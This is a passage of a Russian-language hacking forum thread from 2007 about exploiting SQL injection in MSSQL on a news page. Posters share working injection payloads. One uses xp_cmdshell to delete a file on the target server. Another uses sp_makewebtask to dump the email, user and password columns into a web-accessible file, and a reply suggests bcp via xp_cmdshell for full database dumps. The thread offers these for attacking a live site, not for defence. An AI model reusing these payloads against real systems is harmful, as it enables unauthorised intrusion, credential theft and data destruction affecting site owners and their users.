ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу как закрыть order в запросе к mssql
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 14.09.2007, 10:25
$jason$
Новичок
Регистрация: 12.04.2006
Сообщений: 22
Провел на форуме:
90532

Репутация: 3
По умолчанию
Scipio Огромнейшее спасибо и как я сам недогодался!!!!
а как потом файл жахнуть на сервере? через xp_cmdshell ?
Последний раз редактировалось $jason$; 14.09.2007 в 10:36..
 
Ответить с цитированием

  #12  
Старый 14.09.2007, 10:46
$jason$
Новичок
Регистрация: 12.04.2006
Сообщений: 22
Провел на форуме:
90532

Репутация: 3
По умолчанию
можеш неотвечать разобрался как удалить файл который вывел
Код:
1;+exec+master..xp_cmdshell+"del+F:\www\site.com\www\dir\output.html";SELECT%20*%20From%20News%20Where%20News_ID%20=%201
 
Ответить с цитированием

  #13  
Старый 14.09.2007, 13:28
$jason$
Новичок
Регистрация: 12.04.2006
Сообщений: 22
Провел на форуме:
90532

Репутация: 3
По умолчанию
Вопрос:вот допустим мне нужно не дампить всю таблицу а вывести в файл только нужные колонки email user pass делаю запрос http://site.com/dir/news.cfm?News_ID=1; exec master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT email,user,pass from User"
в файл выводится но значения ОБРЕЗАЮТСЯ по 20 символов и всё т.е некоторые данные такие как email например обрезанные получаются

пробовал так зделать 1; exec master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT email as (50),user as (50),pass as (50) from User"

говорит The identifier that starts with 'querry'is too long. Maximum length is 128.
cast(email as nvarchar(50)) так тоже пробовал и тотже is too long. Maximum length is 128


и ещё sp_makewebtask сохраняет в виде html таблицы т.е там теги нтмл и нужные данные, если базу большого объёма так сдампить то весить файл будет очень много может знает кто как без тегов нтмл вывести если вообще так можно конечно просто разделить данные например ":" чтоб в файл выводилось userass:email ?
 
Ответить с цитированием

  #14  
Старый 27.09.2007, 16:44
ccrus
Новичок
Регистрация: 16.03.2006
Сообщений: 8
Провел на форуме:
21737

Репутация: 8
Отправить сообщение для ccrus с помощью ICQ
По умолчанию
если есть xpcmdshell юзай bcp
оно тебе куда надо сдампит бд
 
Ответить с цитированием

  #15  
Старый 09.10.2007, 16:07
xena-mil1
Познающий
Регистрация: 17.10.2006
Сообщений: 83
Провел на форуме:
552846

Репутация: 55
По умолчанию
ggggg
Последний раз редактировалось xena-mil1; 29.08.2008 в 22:41..
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
FAQ по выделенным серверам †Romi4† Авторские статьи 4 31.08.2009 16:19
Подробный Faq о открытии некоторых моделей домофонов system_32 Электроника и Фрикинг 23 18.12.2008 14:25
Вообщем про домофон... CRL Электроника и Фрикинг 16 18.12.2008 14:08
SQL инъекция (в т.ч. и blind SQL) kot777 Уязвимости 4 04.10.2008 17:18
SQL injection в MySql сервере версии 3,x bandera Чужие Статьи 3 04.06.2006 16:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ